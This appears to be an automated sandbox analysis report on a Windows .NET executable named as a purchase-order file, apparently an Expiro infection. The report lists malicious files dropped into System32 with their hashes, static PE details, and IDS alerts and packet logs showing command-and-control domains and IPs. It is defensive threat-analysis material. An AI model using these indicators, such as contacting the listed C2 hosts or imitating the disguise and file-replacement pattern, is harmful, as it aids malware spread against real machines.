                                                                                                                                                                    C:\Windows\System32\msiexec.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1199616
                                                                                                                                                                    Entropy (8bit):5.083912734833264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:L4DbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2bsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:ABB50E8166D8F7CA9596696CE75B8653
                                                                                                                                                                    SHA1:E4AB7BEE68145417EAFC19F2BB042D3AC06BB22E
                                                                                                                                                                    SHA-256:5DA2AC1B748B7CF966503F1D8B3283A23391CCEC94E7F81F077FD02D9BAB808B
                                                                                                                                                                    SHA-512:2189F96F3A2F4D75C8482728A98BAF1DF2E15E6A8C6AE181CDDE56BDA4836647FF8A612833090E94303911D8F9A0577E8BAD56432E94041F2D8B48DBB471E91C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\snmptrap.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1146880
                                                                                                                                                                    Entropy (8bit):5.027589917373733
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:c9fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SfsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:F35B03B0A56AB372234FE7A532455C96
                                                                                                                                                                    SHA1:B02C8D43B01DAABCB9B25604C4C260ED88533800
                                                                                                                                                                    SHA-256:491176B9690D211107E07B12B10845E49364AD2CBA4FA52BE309C9BB309ED9E4
                                                                                                                                                                    SHA-512:CC5AC5ECAAFEC96D866827945BCC529536DAA85920DFD958E58524B9CE6963485B279CBFF702D87353C9FEC6A96FB2E7DBE770CD0377B8429991E06C0B8F1C8F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................|..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\sppsvc.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):5161984
                                                                                                                                                                    Entropy (8bit):7.256979393146544
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:ECLZqizFGeZV8ppBcq+NFabvy5FEz9AGknDD527BWG:XLDzFGmVWQq+NFarCFUInDVQBWG
                                                                                                                                                                    MD5:093EF201B5195154962FBEFB83EFDBD9
                                                                                                                                                                    SHA1:9E41A58490DE46C58FD4DEBAD538030C2E562065
                                                                                                                                                                    SHA-256:499A6F9A0752832220F633EE4C333C3887755CF2F2F0B9C8E3ED5D1215FAE91A
                                                                                                                                                                    SHA-512:E25379A4182699C43FF9AD9A6A08B47FE51FC8D8F29D544995476945E5749778C4C7D18BE931AEE264EF4315163EE98AF076ACDDE3E3F0628F9AA8F5A8A36ADB
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u".j1C.91C.91C.9j+.80C.98;89)C.9%(.8(C.9%(.83C.9%(.8"C.91C.9-B.9%(.8.C.9%(.85C.9%(T90C.9%(.80C.9Rich1C.9........PE..d.....}'..........".......:......... ..........@................CS P......... O.....4.O..................................................... ;C.......E..+....D..z..................PFA.T.....................<.(.....<...............<. ............................text...rs9......t9................. ..`?g_Encry.-....9......x9............. ..`?g_Encry|-....9.......9............. ..`?g_Encry......9..0....9............. ..`?g_Encry.-... :.......:............. ..`.rdata.......P:......2:.............@..@.data...`....`C......>C.............@....pdata...z....D..|....C.............@..@.rsrc....+....E..,...HE.............@..@.reloc...`....E..P...tE.............@...................................................................................................

                                                                                                                                                                    C:\Windows\System32\vds.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1303552
                                                                                                                                                                    Entropy (8bit):7.171589649045072
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:MZ0FxT1UoYr99GdcpKmsqjnhMgeiCl7G0nehbGZpbD:AwWcqDmg27RnWGj
                                                                                                                                                                    MD5:0C54A7E73768E6C53E87391113A18ADF
                                                                                                                                                                    SHA1:11C1A323C8F15F39426141F4C00D608923294203
                                                                                                                                                                    SHA-256:402AD7AF50C64802065A2730446D7646F95865E491F68865A9F51BCB57E3B934
                                                                                                                                                                    SHA-512:A5A424959A179DEA16C14182F7358F1E758224BF60947777E566CE04A68047C1DD2CE6B99A82513C5FEF4E42203980AA8E65FE4ABEA18DA61A002A8EED4645A2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@......%#.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1339392
                                                                                                                                                                    Entropy (8bit):5.269312734160651
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:tyoKo2fRple9pBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:tyocJApBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:E407267AE95CAC7E022BCB9CB497566F
                                                                                                                                                                    SHA1:AA25A40070A0B74D196B5A6AB66EF903C0D08F3F
                                                                                                                                                                    SHA-256:D222BCF76DD12E72229793A4EACC23A04B18F06C846E42DFF06B49FD5674ECBF
                                                                                                                                                                    SHA-512:D76B7035C46C8EE70E4DDBD08EEFF29B208614FA39D0FCC79CCD7678D287177A8CA0AB5B60830890BCE3A1E1A34B68FC7D80547F8ABDC9D8CA3B09F3E275DCAE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.......................................... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\wbengine.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2164736
                                                                                                                                                                    Entropy (8bit):7.062054458425701
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:YWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKBDmg27RnWGj:60zuNI1D527BWG
                                                                                                                                                                    MD5:ADB425AC8592C2AD75F997794106A5E3
                                                                                                                                                                    SHA1:85E502E17FBE2A4AD0B2B6CC8CB7F5909DCDFE19
                                                                                                                                                                    SHA-256:099D71F0E93324540082BA24519F3D159B6C6E2039137D749A6DF584CEC1EFEC
                                                                                                                                                                    SHA-512:1E1FA5E5833FB420143D21A804485BBC1CB79466058A333F7CE0D8317C212F4C1AAE57AFC0FF6CC12E94D9352AFF64471F1E1E91DC275218AA76C768CF349371
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.......!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.09988831476579194
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:QcCVw1CK3l/k/uMclF6vMclFq5zrbNOn+SkUeYDwDzymfw1Czj:nAwMKV/kqF69Fq5zrJO+pawHymfwMv
                                                                                                                                                                    MD5:39D963F879A8A3272D7A454D0C1CB098
                                                                                                                                                                    SHA1:59937021900C69B85995F94AE2E24EE982195A87
                                                                                                                                                                    SHA-256:93592A32A7AE720A5E7F003C1D8F3712E6AD9F754543EABDE12D6D226134A4A2
                                                                                                                                                                    SHA-512:2708BAA6529BFE2C6D43394528869D085BC6F678182132F26BFD0133F39350BEDB7C9685A2C54D54E87AC064620D15B17A862A48085199EC0BDC9BBE4EF1EE5E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:....`...`.......................................`...!...........................@...x.....SU....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........2^...A..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.@...x.....SU....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.10132232056834319
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:DIJCK3l/k/uMclF6vMclFq5zrUHNMu3n+SkUeYDwDzyMyCzb:DCCKV/kqF69Fq5zrWX+pawHyvCn
                                                                                                                                                                    MD5:2B0805473B0702A487FAD39C021C3FC6
                                                                                                                                                                    SHA1:99AE9BB4A4FBF0983C710153E10FF7352A311427
                                                                                                                                                                    SHA-256:5C72DFAF180B4E03B00BEBC6C381DA830BDDEB0C4A18390509D7D49A0E4D972F
                                                                                                                                                                    SHA-512:1A50032195A3455A2CD5A33D134EB4ECAA626BDC1E155FDF01029A062DF637D94F905847D0CDA7156D915EE9E04BD8C6DEA5D44C70E2590D2100216EAE7B0B36
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:....h...h.......................................h...!...........................@...x.....^U....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`............`...A..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.@...x.....^U............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.09875454166291896
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:uUeCK3Nk/uMclF6vMclFq5zrj3HNIn+SkUeYDwDzy1Czr:uZCK9kqF69Fq5zrZI+pawHy1C3
                                                                                                                                                                    MD5:0E668322BEABC3B502E254931CB6301B
                                                                                                                                                                    SHA1:BA401154DBECDD01EFC6ED695C0C243D42A54C88
                                                                                                                                                                    SHA-256:7357958C9A30C1C001E81ED462CDF8A3BB56E1051081FAB831D9E6544AEC7168
                                                                                                                                                                    SHA-512:10E8A32322D7497268BBD6CE2659160FECB03CAC032C00CE77ABC71129869C6E0CC674009373ABEEF4E4B0B2059CBFFDC80AAAAA487BB9811AD345A47A16AB72
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:....X...X.......................................X...!...........................@...x.....TU....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........UF...A..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.@...x.....TU............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.884290221622837
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    File name:RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                    MD5:06c13587e9a7af60860cb6e2c4f3a7b2
                                                                                                                                                                    SHA1:238f5ddcd0193aba7b760b7ab6f3f982d73383b5
                                                                                                                                                                    SHA256:efd64c0b88bbe45461d13b2a0acd9544218f819f4579af35b5fc92e20d5f6fa5
                                                                                                                                                                    SHA512:b9254b49e477e7d60f077ec17ea2dee374d06c6ac095f1b70797d56fa523729b2f23cf9c5810972c515ea7d4d15923314b93da8b50a2aaf494d6133474cb6c8e
                                                                                                                                                                    SSDEEP:24576:y1zGUxjCMfFrJirFpgEZR4IGqiHVtAgjSN9/pggC0gPAMhCKqX:0L/9QrF/ZR4DH4/begC0WAfZ
                                                                                                                                                                    TLSH:9465018D3125B18FC497C9708A54ED78EA746CAA9B0BC203D5E31EEFBD1D5879E041E2
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.................0.............n.... ........@.. .......................@............@................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:323636b29699c72c

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x55c96e
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0xC6CF0F5C [Wed Sep 11 20:17:32 2075 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x15c91c0x4f.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x15e0000x2a08.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1620000xc.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x20000x15a9740x15aa0010f3457065cfc79b07e8b4db80c74c7cFalse0.9333401888748648data7.887666262860419IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0x15e0000x2a080x2c0069617c58d9231710e87534bbc5354806False0.8746448863636364data7.485994825853279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x1620000xc0x2008b753ce6ef7cd20af691528b93a2087eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_ICON0x15e1300x244fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9797740720817644
                                                                                                                                                                    RT_GROUP_ICON0x1605800x14data1.05
                                                                                                                                                                    RT_VERSION0x1605940x288data0.46141975308641975
                                                                                                                                                                    RT_MANIFEST0x16081c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2024-11-28T22:44:28.600332+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749718132.226.247.7380TCP
                                                                                                                                                                    2024-11-28T22:44:37.090921+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.749740TCP
                                                                                                                                                                    2024-11-28T22:44:37.090921+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.749740TCP
                                                                                                                                                                    2024-11-28T22:44:41.628617+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749754132.226.247.7380TCP
                                                                                                                                                                    2024-11-28T22:44:49.363972+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7532511.1.1.153UDP
                                                                                                                                                                    2024-11-28T22:44:51.227117+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.749780172.234.222.13880TCP
                                                                                                                                                                    2024-11-28T22:44:52.841706+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7548521.1.1.153UDP
                                                                                                                                                                    2024-11-28T22:44:53.832881+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7548521.1.1.153UDP
                                                                                                                                                                    2024-11-28T22:44:54.848703+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7548521.1.1.153UDP
                                                                                                                                                                    2024-11-28T22:44:56.874648+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7548521.1.1.153UDP
                                                                                                                                                                    2024-11-28T22:46:06.959081+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74990382.112.184.19780TCP
                                                                                                                                                                    2024-11-28T22:46:17.023299+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.749922TCP
                                                                                                                                                                    2024-11-28T22:46:17.023299+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.749922TCP

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Nov 28, 2024 22:44:26.530987024 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:26.650998116 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:26.654911041 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:26.660605907 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:26.780724049 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:27.994559050 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:28.036232948 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:28.156230927 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:28.461354971 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:28.600332022 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:28.655580997 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:28.655647039 CET44349725104.21.67.152192.168.2.7
